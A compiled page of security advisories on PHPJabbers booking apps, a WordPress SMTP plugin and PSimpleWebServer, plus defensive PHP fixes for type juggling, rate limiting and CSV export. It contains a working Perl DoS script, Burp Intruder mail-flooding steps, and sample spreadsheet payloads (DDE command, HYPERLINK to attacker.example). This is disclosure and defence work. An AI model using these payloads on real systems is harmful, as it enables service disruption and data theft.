<pre><code># Exploit Title: PHPJabbers Restaurant Booking System v3.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/restaurant-booking-system/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51313<br /><br />Description:<br />PHPJabbers Restaurant Booking System v3.0 is vulnerable to CSV injection (formula injection). The application does not validate or neutralize the Unique ID field in the Reservations list before writing it into the exported CSV file, so a value that begins with a formula character (=, +, -, @) is stored verbatim and is evaluated as a formula when an administrator opens the export in a spreadsheet application. Depending on the spreadsheet application and its settings, such a formula can exfiltrate cell contents or, through DDE/command-style formulas, execute commands on the workstation of the user who opens the file. The code runs on the victim's client, not on the web server.<br /><br />Steps to Reproduce:<br />1. Log in to the admin panel.<br />2. Go to the Options menu, click Language, then open the Labels section.<br />3. Enter a CSV injection payload in any field, then go to Import/Export.<br />4. Click Export and open the downloaded CSV file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51313)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System v1.1 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/#sectionDemo<br /># Version: v1.1<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51316<br /><br />Description:<br />The "Forgot Email" feature of PHPJabbers Bus Reservation System v1.1 enforces no rate limit, so an attacker can submit an unbounded number of reset requests for a legitimate user's address. Every request generates an e-mail, leading to a possible Denial of Service (DoS) against the victim's mailbox and the application's mail delivery through the large volume of generated messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL: https://demo.phpjabbers.com/1704800561_577/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Submit the e-mail address of an account that is already registered on the site.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder to repeat the request and start the attack.<br />5. Check the mailbox: one e-mail arrives per request, with no throttling.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51316)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Restaurant Booking System v3.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/restaurant-booking-system/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51314<br /><br />Description:<br />PHPJabbers Restaurant Booking System v3.0 does not enforce rate limiting on the e-mail sending request in the Email Settings section of System Options. Rate limiting is implemented in web applications and APIs to prevent abuse such as brute-force attacks or excessive requests that could lead to resource exhaustion; when it is absent or not properly enforced, an attacker can repeat a request far faster than intended, potentially leading to unauthorized access, data breaches, or service disruption. Here, an authenticated user can make the application send an unlimited number of e-mails to an arbitrary address.<br /><br />Steps to Reproduce:<br /><br />1. Log in to the dashboard.<br />2. Go to the System Options menu and open the Email Settings section.<br />3. Enter any e-mail address and name in the Email address and Name fields and submit.<br />4. Repeat the submission (for example by replaying the captured request) and check the mailbox: every submission produces another e-mail.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51314)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Event Booking Calendar v4.0 - No Rate Limit on Forgot Password<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51294<br /><br />Description:<br />The "Forgot Password" functionality of PHPJabbers Event Booking Calendar v4.0 has no rate limit. Without one, a malicious actor can issue password reset requests in rapid succession, an attack known as "password reset bombing": flooding the application with reset requests for a victim's address disrupts the service, overwhelms mail servers, fills the victim's mailbox with reset messages, and can facilitate unauthorized access to user accounts. Implementing proper rate limiting on this endpoint is crucial to mitigate such attacks and improve the overall security posture of the system.<br /><br />Steps to Reproduce:<br /><br />1. Visit this URL: https://demo.phpjabbers.com/1700468974_388/index.php?controller=pjBase&action=pjActionForgot<br />2. Submit the e-mail address of an account that is already registered on the site.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder to repeat the request and start the attack.<br />5. Check the mailbox: one reset e-mail arrives per request, with no throttling.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51294)<br /><br /><br /><br /># Exploit Title: PHPJabbers Event Booking Calendar v4.0 - Missing Rate Limiting<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51293<br /><br />Description:<br />PHPJabbers Event Booking Calendar v4.0 does not enforce rate limiting on the e-mail sending request in the Email Settings section of System Options. Rate limiting is implemented in web applications and APIs to prevent abuse such as brute-force attacks or excessive requests that could lead to resource exhaustion; when it is absent or not properly enforced, an attacker can repeat a request far faster than intended, potentially leading to unauthorized access, data breaches, or service disruption. Here, an authenticated user can make the application send an unlimited number of e-mails to an arbitrary address.<br /><br />Steps to Reproduce:<br /><br />1. Log in to the dashboard.<br />2. Go to the System Options menu and open the Email Settings section.<br />3. Enter any e-mail address and name in the Email address and Name fields and submit.<br />4. Repeat the submission (for example by replaying the captured request) and check the mailbox: every submission produces another e-mail.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51293)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Park Booking System v3.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-park-booking/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51311<br /><br />Description:<br />PHPJabbers Car Park Booking System v3.0 is vulnerable to CSV injection (formula injection). The application does not validate or neutralize the Unique ID field in the Reservations list before writing it into the exported CSV file, so a value that begins with a formula character (=, +, -, @) is stored verbatim and is evaluated as a formula when an administrator opens the export in a spreadsheet application. Depending on the spreadsheet application and its settings, such a formula can exfiltrate cell contents or, through DDE/command-style formulas, execute commands on the workstation of the user who opens the file. The code runs on the victim's client, not on the web server.<br /><br />Steps to Reproduce:<br />1. Log in to the admin panel.<br />2. Go to the Options menu, click Language, then open the Labels section.<br />3. Enter a CSV injection payload in any field, then go to Import/Export.<br />4. Click Export and open the downloaded CSV file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51311)<br /></code></pre>
<pre><code>Vulnerability Summary from Wordfence Intelligence<br /><br />Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Authorization Bypass via type connect-app API<br /><br />Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress<br /><br />Plugin Slug: post-smtp<br /><br />Affected Versions: <= 2.8.7<br /><br />CVE ID: CVE-2023-6875<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Ulyses Saicha<br /><br />Fully Patched Version: 2.8.8<br /><br />Bounty Awarded: $4,125.00<br /><br />The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to unauthorized access to and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and to view the e-mail logs, including password reset e-mails, allowing site takeover.<br /><br />Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Unauthenticated Stored Cross-Site Scripting via device<br /><br />Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress<br /><br />Plugin Slug: post-smtp<br /><br />Affected Versions: <= 2.8.7<br /><br />CVE ID: CVE-2023-7027<br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Sean Murphy<br /><br />Fully Patched Version: 2.8.8<br /><br />Bounty Awarded: $825.00<br /><br />The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages; the scripts execute whenever a user accesses an injected page.<br /><br />Technical Analysis #1: Authorization Bypass via type connect-app API<br /><br />The POST SMTP Mailer plugin configures an SMTP mailer in WordPress, replacing the default PHP mail() function to improve e-mail delivery. In addition, a mobile application can be connected to the plugin using a generated auth key. Examining the code reveals that the plugin uses the connect_app() function in the Post_SMTP_Mobile_Rest_API class to save the mobile application connection settings.<br /><br />[View this code snippet on the blog]<br /><br />Knowledge of the randomly generated auth key is required in order to set the FCM token. However, the plugin deletes the stored auth key in all cases, whether or not the supplied value matched, so after any one request the stored key is gone. Because the key is compared with a loose, type-juggling comparison, an attacker can then send a second request with a zero value for the auth key: the deleted stored key compared against zero evaluates as true, and the attacker's FCM token is accepted.<br /><br />With the connected application, it is possible to access and view all logged e-mails, including password reset e-mails. This can be used for complete site compromise: the attacker triggers a password reset for the site's administrator user and then reads the reset e-mail from the log data. With the reset link from that e-mail, they can set a new password for the user and log in to the account.<br /><br />Once an attacker has gained administrative access to a WordPress site they can manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and to modify posts and pages, which can be leveraged to redirect site users to other malicious sites.<br /><br />Technical Analysis #2: Unauthenticated Stored Cross-Site Scripting via device<br /><br />In the same connect_app() function, the mobile application connection settings include the device value. Examining the code reveals that the device value is not sanitized on input in connect_app(), and that the stored value is not escaped on output in the section() function.<br /><br />[View this code snippet on the blog]<br /><br />This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute whenever an administrator opens the mobile application settings page. Because the script runs in the administrator's browser session, it can perform any administrative action on the attacker's behalf, such as creating an administrator account or uploading a plugin file, which on WordPress amounts to remote code execution.<br /><br />Wordfence Firewall<br /><br />The following graphic illustrates how the Wordfence firewall prevents an attacker from successfully exploiting the authorization bypass vulnerability.<br /><br />[Graphic: Wordfence firewall blocking the POST SMTP Mailer authorization bypass]<br /><br />Disclosure Timeline<br /><br />December 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion for a separate vulnerability in the plugin.<br /><br />December 14, 2023 – We receive the submission of the Authorization Bypass vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.<br /><br />December 15, 2023 – We validate the report and confirm the proof-of-concept exploit.<br /><br />December 15, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />December 19, 2023 – We receive the submission of the Stored Cross-Site Scripting vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.<br /><br />December 20, 2023 – We validate the report and confirm the proof-of-concept exploit. We send over the full disclosure details for the unauthenticated XSS.<br /><br />January 1, 2024 – The fully patched version, 2.8.8, is released.<br /><br />January 3, 2024 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />February 2, 2024 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we detailed an Authorization Bypass vulnerability and a Stored Cross-Site Scripting vulnerability within the POST SMTP Mailer plugin affecting versions 2.8.7 and earlier. The Authorization Bypass vulnerability allows unauthenticated threat actors to reset the API key used to authenticate to the mailer and view logs, including password reset e-mails, resulting in a full site compromise. The Stored Cross-Site Scripting vulnerability allows unauthenticated threat actors to inject malicious web scripts into pages. The vulnerabilities have been fully addressed in version 2.8.8 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of POST SMTP Mailer.<br /><br />Wordfence users running Wordfence Premium, Wordfence Care, and Wordfence Response have been protected against these vulnerabilities as of January 3, 2024. Users still using the free version of Wordfence will receive the same protection on February 2, 2024.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br /></code></pre>
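The authorization bypass analysis above turns on two facts: the stored auth key is deleted on every request, and the supplied key is compared loosely. The PHP below is an added example, not the plugin's code, that reproduces the condition in isolation with a hypothetical `check_key_loose()` / `check_key_strict()` pair. It assumes, as WordPress's `get_option()` behaves, that a deleted option reads back as `false`, and that the request value arrives as a string or an integer.

```php
<?php
// Added example (not the plugin's code): why a loose comparison against a
// deleted key is bypassable, and the strict check that closes the hole.
// Assumption: like WordPress's get_option(), the store returns false once the
// key has been deleted; the client-supplied value is a string or an integer.

declare(strict_types=1);

/** Vulnerable pattern: PHP's == performs type juggling before comparing. */
function check_key_loose(mixed $stored, mixed $supplied): bool
{
    return $stored == $supplied;
}

/**
 * Hardened pattern: the stored key must exist and be a non-empty string, the
 * supplied value must be a string, and the comparison is constant-time.
 */
function check_key_strict(mixed $stored, mixed $supplied): bool
{
    if (!is_string($stored) || $stored === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($stored, $supplied);
}

// State after the key has been deleted: the store returns false.
$deleted = false;

// An attacker who does not know the key sends 0 (or "0", or an empty string).
foreach ([0, "0", ''] as $guess) {
    printf("loose  deleted vs %-4s : %s\n", var_export($guess, true),
        check_key_loose($deleted, $guess) ? 'ACCEPTED (bypass)' : 'rejected');
    printf("strict deleted vs %-4s : %s\n", var_export($guess, true),
        check_key_strict($deleted, $guess) ? 'ACCEPTED' : 'rejected');
}

// With a real key present, only the exact key passes the strict check.
$real = bin2hex(random_bytes(16));
printf("strict real   vs real : %s\n",
    check_key_strict($real, $real) ? 'ACCEPTED' : 'rejected');
printf("strict real   vs 0    : %s\n",
    check_key_strict($real, 0) ? 'ACCEPTED' : 'rejected');
```

Run under PHP 8, every loose comparison of the deleted (`false`) key against `0`, `"0"` or `''` is accepted, because `==` converts both sides to booleans and `false == false`; the strict version rejects all three and accepts only the genuine key. The `is_string`/non-empty guard matters as much as `hash_equals`: a deleted or never-set key must fail closed rather than match whatever the attacker sends.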
<pre><code>#!/usr/bin/perl<br />use strict;<br />use warnings;<br />use IO::Socket::INET;<br /><br /># Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 11 January 2024<br /># Vendor Homepage: http://www.pmx.it/<br /># Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing<br /># Vendor notified: not reported<br /># Tested Version: PSimpleWebServer 2.2-rc2<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://www.youtube.com/watch?v=YFfBuWnHeQY<br /><br />#1. Description<br /><br /># This technique works against Windows XP Professional Service Pack 2 and 3 (English).<br /># The server does not properly handle a request that carries a large amount of data in an<br /># HTTP header. The request below places 2104 bytes of filler in the Connection header; the<br /># server crashes as soon as the request is received and processed, causing a denial of<br /># service condition.<br /># Successful exploitation allows remote attackers to crash the affected server, denying<br /># service to legitimate users. No code execution is attempted: the script only sends the<br /># oversized request.<br /><br />#2. Proof of Concept - PoC<br /><br /># $^O reports "MSWin32" on Windows (the original compared against "windows", so the<br /># screen was never cleared there).<br />my $cmd = ($^O eq "MSWin32") ? "cls" : "clear";<br />system($cmd);<br /><br />intro();<br />my ($ip, $port) = main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br /># Oversized header value: 2104 x "A" (0x41). The original assigned "\x41" x 2014 and then<br /># overwrote it with "x\41" x 2104, a typo that yields the two-byte string "x!" repeated;<br /># the intended filler is kept here.<br />my $exploit = "\x41" x 2104;<br /><br />my $socket = IO::Socket::INET->new(<br />    PeerAddr => $ip,<br />    PeerPort => $port,<br />    Proto    => "tcp",<br />);<br /><br />unless ($socket) {<br />    print "[-] Connection to $ip:$port failed!\n";<br />    exit 1;<br />}<br /><br /># Malformed request: a Connection header whose value is the oversized filler.<br />my $header =<br />    "GET / HTTP/1.1\r\n" .<br />    "Host: " . $ip . "\r\n" .<br />    "Connection: " . $exploit . "\r\n";<br />print $socket $header . "\r\n";<br />sleep(1);<br />close($socket);<br /><br />print "\t ==> Done! Exploited!\n";<br /><br />sub intro {<br />    print q {<br /><br /><br /> ,,__<br /> .. .. / o._) <br /> /--'/--\ \-'|| <br /> / \_/ / | <br /> .'\ \__\ __.'.' <br /> )\ | )\ | <br /> // \\ // \\<br /> ||_ \\|_ \\_<br /> '--' '--'' '--' <br /> <br /> [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br />    };<br />}<br /><br /># Parse and validate the command line; returns (ip, port).<br />sub main {<br />    my ($ip, $port) = @ARGV;<br />    unless (defined($ip) && defined($port)) {<br />        print "\n\tUsage: $0 &lt;ip&gt; &lt;port&gt;\n";<br />        exit(-1);<br />    }<br />    return ($ip, $port);<br />}<br /><br />#3. Solution / How to fix:<br /><br /># This product version is deprecated.<br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Event Ticketing System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51339<br /><br />Description:<br />The "Forgot Email" feature of PHPJabbers Event Ticketing System v1.0 enforces no rate limit, so an attacker can submit an unbounded number of reset requests for a legitimate user's address. Every request generates an e-mail, leading to a possible Denial of Service (DoS) against the victim's mailbox and the application's mail delivery through the large volume of generated messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL: https://demo.phpjabbers.com/1704798072_893/index.php?controller=pjAdmin&action=pjActionIndex<br />2. Submit the e-mail address of an account that is already registered on the site.<br />3. Capture the request with Burp Suite and send it to the Intruder tab.<br />4. Configure Intruder to repeat the request and start the attack.<br />5. Check the mailbox: one e-mail arrives per request, with no throttling.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51339)<br /></code></pre>
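The rate-limit advisories on this page (CVE-2023-51316, CVE-2023-51314, CVE-2023-51294, CVE-2023-51293 and CVE-2023-51339) all reduce to the same defect: an endpoint that sends an e-mail for every request it receives, however many arrive. The PHP below is an added example, not PHPJabbers code, of the server-side control that is missing. The `ResetRateLimiter` class, the `handle_forgot_request()` helper, the limits, and the replayed requests from 203.0.113.7 against victim@example.com are all constructed for illustration; the in-memory bucket store stands in for APCu, Redis or a database table.

```php
<?php
// Added example (not PHPJabbers code): a fixed-window rate limit for a
// "forgot password" / "forgot email" endpoint. Requests are limited per
// client IP (one attacker cannot hammer the endpoint) and per targeted
// address (one victim cannot be flooded from many sources). Storage is an
// in-memory array here; production code would use APCu, Redis or a table.
// Requires PHP 8 (constructor promotion, named arguments).

declare(strict_types=1);

final class ResetRateLimiter
{
    /** @var array<string, array{count:int, window_start:int}> */
    private array $buckets = [];

    public function __construct(
        private int $maxPerWindow = 3,
        private int $windowSeconds = 900,
    ) {}

    /** Returns true if the request may proceed, false if it must be refused. */
    public function allow(string $key, int $now): bool
    {
        $b = $this->buckets[$key] ?? ['count' => 0, 'window_start' => $now];
        if ($now - $b['window_start'] >= $this->windowSeconds) {
            $b = ['count' => 0, 'window_start' => $now];   // window expired
        }
        if ($b['count'] >= $this->maxPerWindow) {
            $this->buckets[$key] = $b;
            return false;
        }
        $b['count']++;
        $this->buckets[$key] = $b;
        return true;
    }
}

/**
 * Decide whether a reset e-mail may be sent for this request. The per-IP
 * limit returns 429; the per-target limit silently drops the mail but still
 * answers 200, so the endpoint cannot be used to enumerate accounts.
 */
function handle_forgot_request(
    ResetRateLimiter $perIp,
    ResetRateLimiter $perTarget,
    string $clientIp,
    string $targetEmail,
    int $now
): array {
    $target = strtolower(trim($targetEmail));
    if (!$perIp->allow('ip:' . $clientIp, $now)) {
        return ['status' => 429, 'send_mail' => false];
    }
    if (!$perTarget->allow('email:' . $target, $now)) {
        return ['status' => 200, 'send_mail' => false];
    }
    return ['status' => 200, 'send_mail' => true];
}

// Constructed replay: the attacker submits the same victim address ten times
// within ten seconds, which is what a Burp Intruder run would do.
$perIp     = new ResetRateLimiter(maxPerWindow: 5, windowSeconds: 900);
$perTarget = new ResetRateLimiter(maxPerWindow: 3, windowSeconds: 900);
$sent = 0;
for ($i = 0; $i < 10; $i++) {
    $r = handle_forgot_request($perIp, $perTarget, '203.0.113.7',
                               'victim@example.com', 1700000000 + $i);
    printf("request %2d -> HTTP %d, mail %s\n", $i + 1, $r['status'],
           $r['send_mail'] ? 'sent' : 'suppressed');
    $sent += $r['send_mail'] ? 1 : 0;
}
printf("10 requests, %d e-mails sent\n", $sent);
```

With these limits the run sends three e-mails, suppresses the fourth and fifth because the target is over its quota, and refuses the sixth onward with 429 because the IP is over its quota; the same ten submissions against the applications in the advisories above produce ten e-mails. Keying on the target address as well as the IP is what protects the victim once the attacker rotates source addresses.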
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51336<br /><br />Description:<br />PHPJabbers Meeting Room Booking System v1.0 is vulnerable to CSV injection (formula injection). The application does not validate or neutralize the Unique ID field in the Reservations list before writing it into the exported CSV file, so a value that begins with a formula character (=, +, -, @) is stored verbatim and is evaluated as a formula when an administrator opens the export in a spreadsheet application. Depending on the spreadsheet application and its settings, such a formula can exfiltrate cell contents or, through DDE/command-style formulas, execute commands on the workstation of the user who opens the file. The code runs on the victim's client, not on the web server.<br /><br />Steps to Reproduce:<br />1. Log in to the admin panel.<br />2. Go to the Options menu, click Language, then open the Labels section.<br />3. Enter a CSV injection payload in any field, then go to Import/Export.<br />4. Click Export and open the downloaded CSV file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51336)<br /></code></pre>
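The three CSV injection advisories on this page (Restaurant Booking System, Car Park Booking System and Meeting Room Booking System) describe the same defect: stored values are written into the export unchanged. The PHP below is an added example, not PHPJabbers code, showing how an exporter neutralises cells that a spreadsheet would otherwise evaluate. The `csv_safe_cell()` and `build_csv()` helpers, the column names and the sample rows, including the DDE-style payload in the third row, are constructed for illustration.

```php
<?php
// Added example (not PHPJabbers code): neutralising spreadsheet formula
// injection when building a CSV export. A cell whose first character would
// make a spreadsheet treat it as a formula (=, +, -, @), or that starts with
// a tab/CR/LF (which can smuggle a formula character past naive checks), is
// prefixed with a single quote so the spreadsheet renders it as literal text.

declare(strict_types=1);

const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r", "\n"];

/** Return $value made safe for a CSV cell that a spreadsheet may evaluate. */
function csv_safe_cell(string $value): string
{
    if ($value === '') {
        return $value;
    }
    // Spreadsheets strip leading spaces before deciding whether a cell is a
    // formula, so the first non-space character is what matters.
    $first = ltrim($value, ' ')[0] ?? '';
    if (in_array($first, FORMULA_TRIGGERS, true)) {
        return "'" . $value;
    }
    return $value;
}

/** Build a CSV document in memory from rows of cells, neutralising every cell. */
function build_csv(array $rows): string
{
    $fh = fopen('php://temp', 'r+');
    foreach ($rows as $row) {
        // fputcsv handles quoting of delimiters, quotes and newlines; the
        // formula prefix is the one thing it does not do for us.
        fputcsv($fh, array_map('csv_safe_cell', array_map('strval', $row)));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed sample rows. The third "Unique ID" is a classic DDE-style
// payload that launches a command when the export is opened in a spreadsheet
// that honours DDE and the user clicks through the security prompts.
$rows = [
    ['Unique ID', 'Name', 'Guests'],
    ['RB-1001', 'Alice', 2],
    ['=cmd|\' /C calc\'!A0', 'Mallory', 4],
    ['-3+2', 'Bob', 1],
    ['@SUM(A1:A9)', 'Carol', 3],
    ["\t=HYPERLINK(\"http://attacker.example/?\"&A1)", 'Dave', 2],
];

echo build_csv($rows);
```

Run with `php csv_export.php`: the first data row is unchanged, while every cell that starts with a trigger character comes out with a leading `'` (and, because it contains spaces or quotes, inside fputcsv's double quotes), so a spreadsheet displays the text instead of evaluating it. The visible quote in a plain text editor is the accepted trade-off of this OWASP-recommended approach; note that it also catches legitimate negative numbers such as `-3`, so apply it to free-text columns rather than numeric ones. Neutralising at export time is the right layer: rejecting formula characters on input does not help when the same data reaches the export through another path, such as the Import/Export feature used in the reproduction steps.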
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51338<br /><br />Description:<br />PHPJabbers Meeting Room Booking System v1.0 is vulnerable to multiple Stored Cross-Site Scripting (XSS) issues. Stored XSS occurs when an application saves attacker-supplied input on the server and later renders it into a page without output encoding, so the injected script runs in the browser of every user who views that page, with that user's session and privileges.<br /><br />Steps to Reproduce:<br />1. Log in to the admin panel.<br />2. The vulnerable parameters are "title" and "name".<br />3. Go to the System Users menu and click Add User.<br />4. Enter an XSS payload in the "Name" input field and save.<br />5. The payload executes and an XSS popup appears.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51338)<br /></code></pre>